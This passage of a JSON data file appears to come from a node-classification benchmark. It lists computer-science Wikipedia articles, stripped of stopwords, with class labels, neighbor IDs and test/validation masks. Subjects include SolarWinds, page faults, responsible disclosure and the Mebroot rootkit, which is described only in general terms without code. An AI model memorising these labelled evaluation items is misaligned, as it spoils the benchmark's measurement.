      6558,
      1952,
      8609,
      4770,
      3876,
      934,
      428,
      5165,
      5677,
      5679,
      5680,
      7341,
      9780,
      8502,
      1591,
      11064,
      2618,
      4410,
      6718,
      191,
      3904,
      10819,
      8644,
      8262,
      9926,
      1610,
      1611,
      4042,
      8524,
      847,
      1999,
      7292,
      7889,
      6228,
      3413,
      5845,
      1879,
      7421,
      7386,
      477,
      7395,
      4838,
      6502,
      10470,
      10089,
      11625,
      5612,
      1776,
      5872,
      9330,
      9331,
      2804,
      4341,
      9714,
      10739,
      3960,
      2556,
      2045,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 3614,
    "label": 4,
    "text": "SolarWinds:solarwinds solarwinds inc. american company develops software businesses help manage networks systems information technology infrastructure solarwinds headquartered austin texas sales product development offices number locations united states several countries around world company publicly traded may 2009 end 2015 october 2018 also acquired number companies still operates original brand names including pingdom papertrail loggly solarwinds officially founded 1999 tulsa oklahoma 2009 maintained profitability since founding company co-founded donald yonce former executive walmart brother david yonce solarwinds released first products trace route ping sweep earlier march 1998 released first web-based network performance monitoring application november 2001 according michael bennett became chief executive officer 2006 solarwinds name chosen early employee company nothing solar wind power 2006 company moved headquarters austin texas 300 company total 450 employees based 2011 2007 solarwinds raised funding austin ventures bain capital insight venture partners solarwinds completed initial public offering 112.5 million may 2009 closing higher prices initial day trading ipo solarwinds followed another opentable online restaurant-reservation service perceived break dry spell caused great recession companies went public bain capital insight venture partners backed ipo used opportunity sell shares offering analysts company executives forecasted continued expansion post-ipo including several acquisitions 2010 bennett retired position ceo replaced company former chief financial officer kevin thompson may 2013 solarwinds announced plans invest operations hub salt lake city utah named forbes best small company america citing high-functioning products low costs impressive company growth 2013 solarwinds employing 900 people october 2015 company disclosed talks then-unnamed party interested acquiring company making solarwinds privately held company acquisition private equity technology investment firms silver lake partners thoma bravo llc announced late 2015 january 2016 solarwinds taken private ownership 4.5 billion deal sale company employed 1,770 people worldwide 510 based austin reported revenues half billion dollars year november 2017 solarwinds released appoptics integrates much solarwind acquired software portfolio including librato traceview single software-as-a-service package appoptics included compatibility amazon web services microsoft azure september 2018 solarwinds filed ipo three years owned private equity firms solarwinds completed ipo october 19 2018 solarwinds reportedly updated network performance monitor product december 2018 enhancements cisco application centric infrastructure aci according wall street journal solarwinds offers freely downloadable software potential clients markets advanced software offering trial versions following funding 2007 solarwinds acquired several companies including neon software ipmonitor corp. opened european sales office ireland ipo 2009 solarwinds acquired number companies products including acquisition new zealand-based software maker kiwi enterprises announced january 2009 solarwinds acquired several companies 2011 ranked 10 forbes magazine list fastest-growing tech companies january 2011 acquired hyper9 inc austin-based virtualization management company undisclosed terms july solarwinds completed acquisition idaho-based network security company trigeo 35 million trigeo offices post falls added list solarwinds location already included satellite offices dallas salt lake city tulsa well operations australia czech republic india ireland singapore early 2012 month acquiring dameware solarwinds acquired patch management software provider eminentware december solarwinds acquired rhinosoft adding company product ftp voyager solarwinds suite tools services may 2013 solarwinds acquired n-able technologies 2013 cloud-based information technology services provider deal reportedly valued 120 million cash october acquired boulder colorado-based database performance management company confio software 103 million agreement solarwinds gained sales office london confio main product ignite 2014 2015 company acquired swedish web-monitoring company pingdom san francisco-based metrics monitoring company librato 40 million log management service papertrail 41 million 2015 solarwinds announced acquisition librato monitoring company capzure technology msp manager software n-able solarwinds previously acquired june 2016 solarwinds acquired logicnow rival remote monitoring software company new subsidiary solarwinds msp formed merging logicnow n-able technologies company announced subsidiary led logicnow former ceo walter scott new title executive vice president 2017 2019 solarwinds acquired spamexperts email security company loggly log management analytics company trusted metrics provider threat monitoring management software samanage service desk asset management provider",
    "neighbors": [
      939,
      2765,
      1935,
      7248,
      6834,
      467,
      1111
    ],
    "mask": "Test"
  },
  {
    "node_id": 3615,
    "label": 2,
    "text": "Page_fault:page fault page fault sometimes called pf pf hard fault type exception raised computer hardware running program accesses memory page currently mapped memory management unit mmu virtual address space process logically page may accessible process requires mapping added process page tables may additionally require actual page contents loaded backing store disk processor mmu detects page fault exception handling software handles page faults generally part operating system kernel handling page fault operating system generally tries make required page accessible location physical memory terminates program case illegal memory access contrary fault might suggest valid page faults errors common necessary increase amount memory available programs operating system utilizes virtual memory including openvms microsoft windows unix-like systems including macos linux *bsd solaris aix hp-ux z/os page loaded memory time fault generated marked memory management unit loaded memory called minor soft page fault page fault handler operating system merely needs make entry page memory management unit point page memory indicate page loaded memory need read page memory could happen memory shared different programs page already brought memory programs page could also removed working set process yet written disk erased operating systems use secondary page caching example hp openvms may remove page need written disk remained unchanged since last read disk example place free page list working set deemed large however page contents overwritten page assigned elsewhere meaning still available referenced original process allocated since faults involve disk latency faster less expensive major page faults mechanism used operating system increase amount program memory available demand operating system delays loading parts program disk program attempts use page fault generated page loaded memory time fault called major hard page fault page fault handler os needs find free location either free page memory non-free page memory latter might used another process case os needs write data page written since last modified mark page loaded memory process page table space made available os read data new page memory add entry location memory management unit indicate page loaded thus major faults expensive minor faults add storage access latency interrupted program execution page fault occurs reference address part virtual address space meaning page memory corresponding called invalid page fault page fault handler operating system generally pass segmentation fault offending process indicating access invalid usually results abnormal termination code made invalid reference null pointer usually represented pointer address 0 address space many operating systems set memory management unit indicate page contains address memory include page virtual address space attempts read write memory referenced null pointer get invalid page fault illegal accesses invalid page faults invalid conditions result segmentation fault bus error resulting programming termination crash core dump depending operating system environment often problems caused software bugs hardware memory errors caused overclocking may corrupt pointers make correct software fail also crash operating system operating systems windows unix unix-like systems provide differing mechanisms reporting errors caused page faults windows uses structured exception handling report page fault-based invalid accesses access violation exceptions unix unix-like systems typically use signals sigsegv report error conditions programs program receiving error handle operating system performs default action typically involving termination running process caused error condition notifying user program malfunctioned recent versions windows often report problems simply stating something like program must close experienced user programmer access debugger still retrieve detailed information recent windows versions also write minidump similar principle core dump describing state crashed process unix unix-like operating systems report conditions user error messages segmentation violation bus error may also produce core dump page faults nature degrade performance program operating system degenerate case cause thrashing optimization programs operating system reduce number page faults improve performance program even entire system two primary focuses optimization effort reducing overall memory usage improving memory locality reduce page faults system programmers must make use appropriate page replacement algorithm suits current requirements maximizes page hits many proposed implementing heuristic algorithms reduce incidence page faults generally making physical memory available also reduces page faults major page faults conventional computers use hard disk drives storage significant impact performance average hard disk drive average rotational latency 3 ms seek time 5 ms transfer time 0.05 ms/page therefore total time paging near 8 ms 8,000 μs memory access time 0.2 μs page fault would make operation 40,000 times slower",
    "neighbors": [
      3725,
      6797,
      2066,
      11539,
      789,
      5397,
      1304,
      6296,
      7071,
      10148,
      6821,
      2473,
      6063,
      7471,
      7728,
      7983,
      823,
      7351,
      2745,
      1593,
      6078,
      9151,
      9919,
      3010,
      4423,
      1736,
      6087,
      2250,
      6221,
      5840,
      8273,
      2514,
      9300,
      3157,
      86,
      10333,
      5598,
      8551,
      7273,
      4334,
      5363,
      2168,
      11130,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 3616,
    "label": 4,
    "text": "Computer_security_model:computer security model computer security model scheme specifying enforcing security policies security model may founded upon formal model access rights model computation model distributed computing particular theoretical grounding computer security model implemented computer security policy complete list available articles specific security models see",
    "neighbors": [
      1792,
      10170,
      4067,
      5060,
      4583,
      5543,
      4299,
      3440,
      4912,
      210,
      6162,
      1364,
      10580,
      8150,
      10968,
      3417,
      9690,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3617,
    "label": 0,
    "text": "Semantic_role_labeling:semantic role labeling natural language processing semantic role labeling also called shallow semantic parsing process assigns labels words phrases sentence indicate semantic role sentence agent goal result consists detection semantic arguments associated predicate verb sentence classification specific roles example given sentence like mary sold book john task would recognize verb sell representing predicate mary representing seller agent book representing goods theme john representing recipient important step towards making sense meaning sentence semantic analysis sort lower-level abstraction syntax tree i.e categories thus groups fewer clauses category instance book belongs would need two labels possessed possessor whereas book sold john would need two labels goal theme receiver recipient even though two clauses would similar far subject object functions concerned framenet project produced first major computational lexicon systematically described many predicates corresponding roles daniel gildea university california berkeley international computer science institute daniel jurafsky currently teaching stanford university previously working university colorado uc berkeley developed first automatic semantic role labeling system based framenet propbank corpus added manually created semantic role annotations penn treebank corpus wall street journal texts many automatic semantic role labeling systems used propbank training dataset learn annotate new sentences automatically",
    "neighbors": [
      5667,
      7780,
      9796,
      5639,
      1737,
      2059,
      11467,
      5781,
      3127,
      538
    ],
    "mask": "Test"
  },
  {
    "node_id": 3618,
    "label": 2,
    "text": "GNU/Linux_naming_controversy:gnu/linux naming controversy gnu/linux naming controversy dispute members free software community open-source software community whether refer computer operating systems use combination gnu software linux kernel gnu/linux linux proponents term linux argue far commonly used public media serves generic term systems combine kernel software multiple sources proponents term gnu/linux note gnu alone would good name gnu variants combine gnu operating system software software sources gnu/linux term promoted free software foundation fsf founder richard stallman proponents call correction extended term grounds n't give credit major contributor associated free software philosophy gnu longstanding project begun 1984 develop free operating system argued linux kernel independently created 1991 merely provided substantial missing piece several distributions employ fsf-endorsed name debian trisquel parabola gnu/linux-libre 1983 richard stallman founder free software foundation set forth plans complete unix-like operating system called gnu composed entirely free software september year stallman published manifesto dr. dobb journal detailing new project publicly outlining vision free software software development work began january 1984 1991 gnu mid-level portions operating system almost complete upper level could supplied x window system lower level kernel device drivers system-level utilities daemons still mostly lacking gnu kernel called gnu hurd hurd followed ambitious design proved unexpectedly difficult implement marginally usable independently 1991 linus torvalds released first version linux kernel early linux developers ported gnu code including gnu c compiler run linux free software community adopted use linux kernel missing kernel gnu operating system work filled remaining gaps providing completely free operating system next years several suggestions arose naming operating systems using linux kernel gnu components 1992 yggdrasil linux distribution adopted name linux/gnu/x usenet mailing-list discussions one find usages gnu/linux early 1992 gnu+linux early 1993 debian project one time sponsored free software foundation switched calling product debian gnu/linux early 1994 change followed request richard stallman initially proposed lignux suggested gnu/linux instead hearing complaints awkwardness former term gnu june 1994 bulletin describes linux free unix system 386 machines many utilities libraries gnu january 1995 bulletin switched term gnu/linux instead stallman fsf efforts include gnu name started around 1994 reportedly mostly via private communications above-mentioned request debian 1996 may 1996 stallman released emacs 19.31 autoconf system target linux changed lignux shortly thereafter changed linux-gnu emacs 19.32 included essay linux gnu system suggesting people use terms linux-based gnu system gnu/linux system lignux short later used gnu/linux exclusively essay superseded stallman 1997 essay linux gnu project modern free software open-source software systems composed software many different authors including linux kernel developers gnu project vendors behind x window system desktop- server-based distributions use gnu components gnu c library glibc gnu core utilities coreutils bash 2002 analysis source code red hat linux 7.1 typical linux distribution total size packages gnu project found much larger linux kernel later 2011 analysis ubuntu natty release popular linux distribution main repository found 8 13 consisted gnu components range depending whether gnome considered part gnu 6 taken linux kernel 9 including direct dependencies determining exactly constitutes operating system per se matter continuing debate hand embedded systems handheld devices smartphones like google android residential gateways routers voice ip devices engineered space efficiency mind use linux kernel components gnu system running μclinux likely substitute uclibc glibc busybox coreutils google linux-based android operating system use gnu components libraries replacing glibc google bsd-based bionic c library fsf agrees gnu/linux appropriate name systems also systems use gnu userspace and/or c library top non-linux kernel example debian gnu/hurd gnu userland gnu kernel debian gnu/kfreebsd uses gnu coreutils c library kernel freebsd fsf justifies name gnu/linux primarily grounds gnu project specifically developing complete system argue linux kernel filled one final gaps large number gnu components gnu source code used systems secondary argument addition fsf also argues gnu/linux recognizes role idealism played building community helps public recognize practical importance ideals contrast focus technical advantage rather freedom linux kernel developers case linux kernel notable recurring examples focus technical advantage freedom come long-time inclusion linux kernel many non-free firmware files files non-free license terms ordinary understanding operating system includes kernel—the specific subsystem directly interfaces hardware—and userland software employed user application software control computer moreover name gnu name linux intentionally related name unix unix always conceptually included c library userland tools well kernel 1991 release notes versions 0.01 0.11 linux kernel released gnu general public license version 0.12 torvalds wrote torvalds also wrote 1992 tanenbaum-torvalds debate tanenbaum criticized torvalds developing linux monolithic kernel considered obsolete inferior microkernels mach believed linux would rejected favor gnu hurd microkernel stalled development years use word linux refer kernel operating system entire distributions often leads confusion distinctions among three many gnu packages key part almost every linux distribution particularly gnu toolchain present distros unless android included media sources sometimes make erroneous statements well claiming entire operating system rather simply kernel written torvalds confusion legal threats public relations campaigns apparently directed kernel launched sco group alexis de tocqueville institution adti misinterpreted many commentators assume whole operating system targeted sco adti even accused deliberately exploiting confusion regarding suggestions renaming efforts stem egotism personal pique stallman responded interest giving credit gnu project people think want ego fed course 'm asking call 'stallmanix stallman admitted irritation although believes justified response seeing idealistic project stymied made ineffective people n't usually give credit done concluding 're idealist like ruin whole decade response another common argument see fsf acknowledges many people contributed system short name credit argues justify calling system linux continuing speak subject 2010 stallman stated naming simply matter giving equal mention gnu project system widely referred linux people tend think linux started mr. torvalds 1991 think comes vision life really bad problem linux far widespread name eric s. raymond writes linux entry jargon file linus torvalds asked documentary revolution os whether name gnu/linux justified replied earlier comment torvalds naming controversy name gnu/linux particularly using stallman preferred pronunciation see criticized perceived clumsiness verbosity factor torvalds cited downfall operating systems 386bsd linux journal speculated stallman advocacy combined name stems frustration linus got glory stallman wanted others suggested regardless merits stallman persistence sometimes seems lost cause makes gnu look bad example larry mcvoy author bitkeeper used manage linux kernel development opined claiming credit makes one look foolish greedy many users vendors prefer name linux jim gettys one original developers x window system point inclusion non-gnu non-kernel tools kde libreoffice firefox end-user operating systems based linux kernel although gnu/linux often pronounced without slash stallman recommends explicitly saying word slash plus i.e gnu+linux order avoid mistaken suggestion linux kernel gnu package case gnu linux-libre",
    "neighbors": [
      2560,
      2050,
      516,
      1028,
      5644,
      5139,
      2581,
      9237,
      10780,
      4637,
      11297,
      9257,
      1584,
      9266,
      1083,
      4673,
      8258,
      10817,
      8772,
      10822,
      5703,
      8268,
      2134,
      1112,
      3162,
      3674,
      2658,
      6244,
      9320,
      6763,
      10860,
      8304,
      633,
      11388,
      5759,
      11391,
      2179,
      2180,
      7812,
      4230,
      8326,
      9353,
      9865,
      10382,
      657,
      2195,
      9882,
      6301,
      1694,
      3744,
      4265,
      9899,
      10933,
      2233,
      4803,
      5833,
      6352,
      3289,
      3802,
      7904,
      1761,
      10464,
      3817,
      4841,
      7920,
      6898,
      2804,
      8436,
      7938,
      4360,
      1813,
      3350,
      5397,
      2332,
      10012,
      802,
      5410,
      1833,
      815,
      7983,
      6962,
      5430,
      823,
      6968,
      3395,
      3911,
      10063,
      4437,
      11095,
      3422,
      863,
      8033,
      2914,
      9579,
      6508,
      7020,
      10091,
      1394,
      7027,
      1396,
      5492,
      1406,
      3458,
      7555,
      11654,
      4493,
      10127,
      1939,
      11155,
      7573,
      1431,
      9637,
      935,
      4011,
      11180,
      9646,
      1456,
      5555,
      9148,
      9660,
      10687,
      4040,
      457,
      5067,
      4561,
      8147,
      5078,
      2010,
      9696,
      8673,
      1506,
      11232,
      8676,
      2021,
      9190,
      10732,
      1007,
      1524,
      2036,
      5620,
      3068,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3619,
    "label": 4,
    "text": "Responsible_disclosure:responsible disclosure computer security elsewhere responsible disclosure vulnerability disclosure model vulnerability issue disclosed period time allows vulnerability issue patched mended period distinguishes model full disclosure developers hardware software often require time resources repair mistakes hackers computer security scientists opinion social responsibility make public aware vulnerabilities high impact hiding problems could cause feeling false security avoid involved parties join forces agree period time repairing vulnerability preventing future damage depending potential impact vulnerability expected time needed emergency fix workaround developed applied factors period may vary days several months easier patch software using internet distribution channel responsible disclosure fails satisfy security researchers expect financially compensated reporting vulnerabilities vendor expectation compensation might viewed extortion market vulnerabilities developed vulnerability commercialization remains hotly debated topic tied concept vulnerability disclosure today two primary players commercial vulnerability market idefense started vulnerability contributor program vcp 2003 tippingpoint zero-day initiative zdi started 2005 organisations follow responsible disclosure process material bought march 2003 december 2007 average 7.5 vulnerabilities affecting microsoft apple processed either vcp zdi independent firms financially supporting responsible disclosure paying bug bounties include facebook google mozilla barracuda networks vendor-sec responsible disclosure mailing list many cert groups coordinate responsible disclosures google project zero 90-day disclosure deadline starts notifying vendors vulnerability details shared public defensive community 90 days sooner vendor releases fix zdi 120-day disclosure deadline starts receiving response vendor selected security vulnerabilities resolved applying responsible disclosure",
    "neighbors": [
      9217,
      5636,
      1547,
      11,
      11539,
      8212,
      4117,
      9375,
      4644,
      1861,
      711,
      4423,
      8135,
      6474,
      10190,
      7887,
      2262,
      5590,
      2779,
      4956,
      8815,
      5491,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3620,
    "label": 4,
    "text": "Mebroot:mebroot mebroot master boot record based rootkit used botnets including torpig sophisticated trojan horse uses stealth strategies hide user trojan opens back door victim computer allows attacker complete control computer trojan infects mbr allow start even operating system starts allows bypass safeguards embed deep within operating system known trojan intercept read/write operations embed deep within network drivers allows ability bypass firewalls communicate securely using custom encrypted tunnel command control server allows attacker install malware viruses applications trojan commonly steals information victim computer attempt small financial gain mebroot linked anserin another trojan logs keystrokes steals banking information gives evidence showing financial motive likely behind mebroot trojan tries avoid detection hooking atapi.sys also embeds ntoskrnl.exe mebroot executable files registry keys driver modules makes harder detect without antivirus software addition running antivirus software one also remove trojan wiping repairing master boot record hard drive operating system three variants mebroot discovered estimated first version compiled november 2007 december mebroot started drive-by downloads early 2008 second wave attacks arrived february 2008 second variant discovered accompanied modified installer march 2008 third variant discovered attacks became widespread since third variant trojan upgraded try outwit antivirus software unknown mebroot still wild mebroot currently known distributed visiting malicious websites way application exploit estimated 1,500 websites compromised mostly european region traffic websites infected mebroot reach 50,000 100,000 views per day",
    "neighbors": [
      3555,
      10756,
      4421,
      8998,
      9868,
      3629,
      9791,
      7983,
      3473,
      8978,
      7739,
      7515,
      988,
      1791
    ],
    "mask": "None"
  },
  {
    "node_id": 3621,
    "label": 1,
    "text": "Inverse_Symbolic_Calculator:inverse symbolic calculator inverse symbolic calculator online number checker established july 18 1995 peter benjamin borwein jonathan michael borwein simon plouffe canadian centre experimental constructive mathematics burnaby canada user input number calculator use algorithm search calculate closed-form expressions suitable functions roots near number hence calculator great importance working numerical areas experimental mathematics isc contains 54 million mathematical constants plouffe inverter opened 1998 contains 214 million newer version tables 3.702 billion entries june 19 2010 exists 2016 plouffe released portable version plouffe inverter containing 3 billion entries",
    "neighbors": [
      2939
    ],
    "mask": "None"
  },
  {
    "node_id": 3622,
    "label": 3,
    "text": "Lunar_Pool:lunar pool lunar pool known japan video game combines pool pocket billiards aspects miniature golf created developed compile nintendo entertainment system msx stage differently shaped pool table object knock ball pocket using cue ball sixty levels choose friction table adjustable thus lunar reference title along moon-related background imagery within game japanese lunar ball appeared famicom clone systems pirated multi-game cartridges power player super joy iii released wii north american virtual console october 22 2007 lunar pool played boards different shapes wherein player shoot cue ball knock colored balls pockets player fails pocket least one colored ball three consecutive turns player lose one life also player pockets cue ball loses life player pockets colored balls level consecutively without failure player get perfect remark bonus points added player score lunar pool either played alone another player computer game played another player computer players take turns shooting cue ball one player fails knock least one colored balls pocket pockets cue ball opponent turn",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3623,
    "label": 3,
    "text": "Ghostbusters_(1984_video_game):ghostbusters 1984 video game ghostbusters licensed game activision based movie name designed david crane produced brad fregger released several home computer platforms 1984 later video game console systems including atari 2600 master system nes primary target platform commodore 64 programmer initial version game adam bellin versions game released usa except amstrad cpc version released europe msx version released europe south america japan early 1984 ghostbusters movie nearing completion tom lopez vice president activision product development contacted columbia pictures obtain license ghostbusters video game columbia gave activision specific rules requests design content game stipulating finished quickly possible order released movie peak popularity activision forced complete programming work six weeks contrast usual several months development time game activision time rough concept driving/maze game called car wars decided build ghostbusters game effort paid movie game proved huge successes player sets ghost busting franchise city rising psychokinetic pk energy level ability purchase equipment traps upgrade vehicle player negotiates grid representing city need stop roamers reaching temple zuul causes pk energy level jump player moves city block flashing red game mode switches overhead view player vehicle driving location player must move left right vacuum stray ghosts avoid cars player moves screen slimer ghost must guided two proton streams ghost trap ghost successfully captured player income increases aim 10,000 time city pk level reaches 9999 stay-puff marshmallow man appear wreak havoc city thereby ending game versions e.g commodore 64 version first successful game player given account number stores amount money player end game allowed purchasing expensive items use faster cars traps etc. order win games player required earned money initial account balance one earliest uses passwords used 'save game feature home computers versions game feature sampled rendition ghostbusters cry start movie theme song c64 atari 8bit versions produced within game using patented form compression similar adpcm ess electronic speech systems without requiring external hardware produce speech pcjr/tandy port feature antic may 1985 called ghostbusters first adaptation capture feel theme movie based ... enjoyable play edge 2007 called ghostbusters dauntingly good noting despite action sequences expected licensed title game polished intelligently-paced strategic business simulation ernie hudson said kids really hated commodore 64 game thought sucked 1985 print shop reportedly two widely pirated commodore 64 programs ii computing listed ghostbusters eighth magazine list top apple ii games late 1985 based sales market-share data activision best-selling commodore game late 1987 amstrad cpc zx spectrum versions game included 1986 compilation sold million 3 along fighter pilot rambo kung-fu master game also released story far volume iv december 1989 hollywood collection december 1990 knocked daley thompson decathlon top uk spectrum sales chart ghostbusters ported ibm pcjr tandy 1000 1985 due timing-sensitive raster effects game uses incompatible tandy machines 1000/1000a 1000hx 1000ex use 4.77mhz 8088 cpu nes version created association works later changed name bits laboratory version panned critics gamers fans alike monotonous gameplay sloppy controls lack connection original film game also released nintendo entertainment system 1988 1986 japan master system 1987 versions featured added gameplay ghostbusters sneak marshmallow man played like conventional vertical scrolling platform game actually climb stairs get roof however nes version ghostbusters could fire weapons trap ghosts instead sneak floors contrast master system version ghostbusters able shoot ghosts proton streams temporarily make go away nes version considered difficult reason end nes version final screen states conglaturation completed great game prooved justice culture go rest heroes version extremely negatively received critics monotonous gameplay poor graphics sound well unfair difficulty particularly stairway",
    "neighbors": [
      11557,
      9006,
      2159
    ],
    "mask": "Test"
  },
  {
    "node_id": 3624,
    "label": 4,
    "text": "Language-based_security:language-based security computer science language-based security lbs set techniques may used strengthen security applications high level using properties programming languages lbs considered enforce computer security application-level making possible prevent vulnerabilities traditional operating system security unable handle software applications typically specified implemented certain programming languages order protect attacks flaws bugs application ’ source code might vulnerable need application-level security security evaluating applications behavior respect programming language area generally known language-based security use large software systems scada taking place around world computer systems constitute core many infrastructures society relies greatly infrastructure water energy communication transportation rely fully functionally working computer systems several well known examples critical systems fail due bugs errors software shortage computer memory caused lax computers crash hundreds flights delayed april 30 2014 traditionally mechanisms used control correct behavior software implemented operating system level operating system handles several possible security violations memory access violations stack overflow violations access control violations many others crucial part security computer systems however securing behavior software specific level even stronger security achieved since lot properties behavior software lost compilation significantly difficult detect vulnerabilities machine code evaluating source code compilation theory implementation programming language also considered vulnerabilities uncovered developers keep making mistakes instead relying programmers memories strive produce tools codify known common security vulnerabilities integrate directly development process — d. evans d. larochelle 2002 using lbs security software increased several areas depending techniques used common programming errors allowing buffer overflows illegal information flows occur detected disallowed software used consumer also desirable provide proof consumer security properties software making consumer able trust software without receive source code self checking errors compiler taking source code input performs several language specific operations code order translate machine readable code lexical analysis preprocessing parsing semantic analysis code generation code optimization commonly used operations compilers analyzing source code using theory implementation language compiler attempt correctly translate high-level code low-level code preserving behavior program compilation programs written type-safe language java source code must type-check successfully compilation type-check fails compilation performed source code needs modified means given correct compiler code compiled successfully type-checked source program clear invalid assignment errors information value code consumer provides degree guarantee program crash due specific error goal lbs ensure presence certain properties source code corresponding safety policy software information gathered compilation used create certificate provided consumer proof safety given program proof must imply consumer trust compiler used supplier certificate information source code verified figure illustrates certification verification low-level code could established use certifying compiler software supplier gains advantage reveal source code consumer left task verifying certificate easy task compared evaluation compilation source code verifying certificate requires limited trusted code base containing compiler verifier main applications program analysis program optimization running time space requirements power consumption etc program correctness bugs security vulnerabilities etc. program analysis applied compilation static analysis run-time dynamic analysis language-based security program analysis provide several useful features type checking static dynamic monitoring taint checking control-flow analysis information flow analysis described set tools used analyze information flow control program order preserve confidentiality integrity regular access control mechanisms come short decoupling right access information right disseminate flow model goes beyond access matrix model ability specify secure information flow practical system needs access flow control satisfy security requirements — d. denning 1976 access control enforces checks access information concerned happens example system two users alice bob alice file secret.txt allowed read edited prefers keep information system also exists file public.txt free read edit users system suppose alice accidentally downloaded malicious program program access system alice bypassing access control check secret.txt malicious program copies content secret.txt places public.txt allowing bob users read constitutes violation intended confidentiality policy system noninterference property programs leak reveal information variables higher security classification depending input variables lower security classification program satisfies noninterference produce output whenever corresponding input lower variables used must hold every possible value input implies even higher variables program different values one execution another visible lower variables attacker could try execute program satisfy noninterference repeatedly systematically try map behavior several iterations could lead disclosure higher variables let attacker learn sensitive information example systems state whether program satisfies noninterference evaluated compilation assuming presence security type systems security type system kind type system used software developers order check security properties code language security types types variables expressions relate security policy application programmers may able specify application security policy via type declarations types used reason various kinds security policies including authorization policies access control capabilities information flow security security type systems formally related underlying security policy security type system sound programs type-check satisfy policy semantic sense example security type system information flow might enforce noninterference meaning type checking reveals whether violation confidentiality integrity program vulnerabilities low-level code bugs flaws lead program state behavior program undefined source programming language behavior low-level program depend compiler runtime system operating system details allows attacker drive program towards undefined state exploit behavior system common exploits insecure low-level code lets attacker perform unauthorized reads writes memory addresses memory addresses either random chosen attacker approach achieve secure low-level code use safe high-level languages safe language considered completely defined programmers manual bug could lead implementation-dependent behavior safe language either detected compile time lead well-defined error behavior run-runtime java accessing array bounds exception thrown examples safe languages c haskell scala compilation unsafe language run-time checks added low-level code detect source-level undefined behavior example use canaries terminate program discovering bounds violations downside using run-time checks bounds-checking impose considerable performance overhead memory protection using non-executable stack and/or heap also seen additional run-time checks used many modern operating systems general idea identify sensitive code application data analyzing source code done different data separated placed different modules assuming module total control sensitive information contains possible specify leave module example cryptographic module prevent keys ever leaving module unencrypted certifying compilation idea producing certificate compilation source code using information high-level programming language semantics certificate enclosed compiled code order provide form proof consumer source code compiled according certain set rules certificate produced different ways e.g proof-carrying code pcc typed assembly language tal main aspects pcc summarized following steps example certifying compiler touchstone compiler provides pcc formal proof type- memory safety programs implemented java tal applicable programming languages make use type system compilation object code carry type annotation checked ordinary type checker annotation produced many ways similar annotations provided pcc limitations however tal handle security policy may expressed restrictions type system include memory safety control flow among others",
    "neighbors": [
      3587,
      5635,
      5896,
      5399,
      3876,
      5677,
      2737,
      1474,
      5060,
      8262,
      4572,
      6754,
      10469,
      8037,
      8551,
      9061,
      9062,
      5363,
      9846
    ],
    "mask": "None"
  },
  {
    "node_id": 3625,
    "label": 8,
    "text": "GoAgent:goagent goagent gnu gpl open-source cross-platform network access software mainly written python supports windows os x linux linux-based os like android openwrt uses google app engine servers provide users free proxy service gain access blocked information normally used web browsers goagent eventually shut request chinese law enforcement project called xx-net claims reborn goagent first release january 2015",
    "neighbors": [
      4224,
      5254,
      138,
      1692,
      9117,
      7983,
      8630,
      823,
      8640,
      3777,
      2884,
      3781,
      11221,
      5078,
      2661,
      10341,
      9193,
      8554,
      5612,
      4725,
      5749,
      5887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3626,
    "label": 2,
    "text": "Series_40:series 40 series 40 often shortened s40 software platform application user interface ui software nokia broad range mid-tier feature phones well vertu line luxury phones one world widely used mobile phone platforms found hundreds millions devices nokia announced 25 january 2012 company sold 1.5 billion series 40 devices used smartphones nokia primarily uses windows phone 2012 symbian however 2012 2013 several series 40 phones asha line 308 309 311 advertised smartphones although actually support smartphone features like multitasking fully fledged html browser 2014 microsoft acquired nokia mobile phones business part licensing agreement company microsoft mobile allowed use nokia brand feature phones series 40 range however july 2014 company memo revealed microsoft would end future production series 40 devices replaced series 30+ series 40 underlying operating system called intelligent system architecture isa also called nokia operating system nos series 40 introduced 1999 release nokia 7110 96 × 65 pixel monochrome display first phone come wap browser years s40 ui evolved low-resolution ui high-resolution color ui enhanced graphical look third generation series 40 became available 2005 introduced support devices resolutions high qvga 240×320 possible customize look feel ui via comprehensive themes 2012 nokia asha mobile phones 200/201/210 302/306/305/308/310/311 303 311 released used series 40 final feature phone running series 40 nokia 515 2013 running 6th edition series 40 provides communication applications telephone internet telephony voip messaging email client pop3 imap4 capabilities web browser media applications camera video recorder music/video player fm radio phonebook personal information management pim applications calendar tasks basic file management like series 60 provided applications gallery folders subfolders gallery also default location files transferred bluetooth placed user-installed applications series 40 generally mobile java applications flash lite applications also supported mostly used screensavers integrated web browser access web content service provider xhtml/html gateway latest version series 40 called series 40 6th edition introduced new browser based webkit open source components webcore javascriptcore new browser delivers support html 4.01 css2 javascript 1.5 ajax also like higher-end series 60 series 40 run uc browser web browser enhance user web browsing experience latest feature phones asha lineup come nokia xpress browser uses proxy servers compress optimize web pages similar fashion opera mini support syncml synchronization address book calendar notes external services present however many s40 phones synchronization settings must sent via ota text message series 40 embedded software platform open software development via standard de facto content application development technologies supports java midlets i.e java midp cldc technology provide location communication messaging media graphics capabilities s40 also supports flash lite applications",
    "neighbors": [
      1537,
      10754,
      9732,
      5637,
      6,
      11271,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      5677,
      9262,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      1602,
      9292,
      7246,
      1615,
      5201,
      7253,
      3162,
      5211,
      6748,
      607,
      1633,
      2658,
      6763,
      109,
      8315,
      8316,
      8829,
      11391,
      6276,
      3205,
      9350,
      9356,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      2215,
      5290,
      10410,
      3248,
      7857,
      690,
      8882,
      7866,
      1728,
      5824,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      8923,
      9443,
      3300,
      4324,
      7399,
      8423,
      8433,
      5875,
      5369,
      1802,
      4364,
      8472,
      11545,
      5406,
      4383,
      11559,
      2345,
      7983,
      821,
      7991,
      7492,
      10053,
      11079,
      6996,
      854,
      10583,
      4957,
      10080,
      10599,
      6505,
      6508,
      2925,
      5998,
      8577,
      9605,
      3462,
      11655,
      3978,
      1424,
      2449,
      8083,
      7063,
      5019,
      7579,
      4003,
      10660,
      7617,
      967,
      5067,
      2001,
      3542,
      487,
      10215,
      3561,
      495,
      1524,
      1533
    ],
